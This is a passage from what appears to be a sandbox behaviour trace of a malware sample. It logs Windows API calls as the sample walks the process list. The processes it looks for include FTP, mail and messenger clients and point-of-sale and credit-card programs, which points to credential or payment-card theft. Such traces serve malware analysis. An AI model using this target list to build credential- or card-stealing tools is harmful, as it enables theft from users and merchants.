hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0287.940] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0287.942] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0287.944] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0287.945] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0287.947] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0287.949] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0287.953] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0287.955] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0287.956] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0287.958] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0287.960] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0287.962] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0287.963] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0287.965] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0287.969] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0287.971] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0287.972] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0287.974] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0287.983] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0287.984] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0287.986] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0287.988] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0287.989] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0287.991] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0287.993] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0287.994] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0287.996] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0288.001] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0288.003] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0288.004] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0288.006] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0288.007] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0288.009] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0288.010] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0288.014] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0288.016] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0288.018] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0288.019] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0288.020] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.022] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0288.023] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.025] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0288.026] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0288.111] CloseHandle (hObject=0x2170) returned 1 [0288.111] Sleep (dwMilliseconds=0x64) [0288.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0288.242] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.243] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.245] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.249] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.250] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.252] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.254] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.255] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.257] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.258] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.260] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.261] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.265] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.266] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.268] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.277] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.279] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.280] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.282] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.283] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.284] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0288.286] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0288.287] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.289] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.290] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0288.292] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0288.293] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0288.297] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.299] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.300] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0288.302] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.303] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0288.304] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0288.307] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0288.308] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0288.313] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0288.315] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0288.317] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0288.318] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) 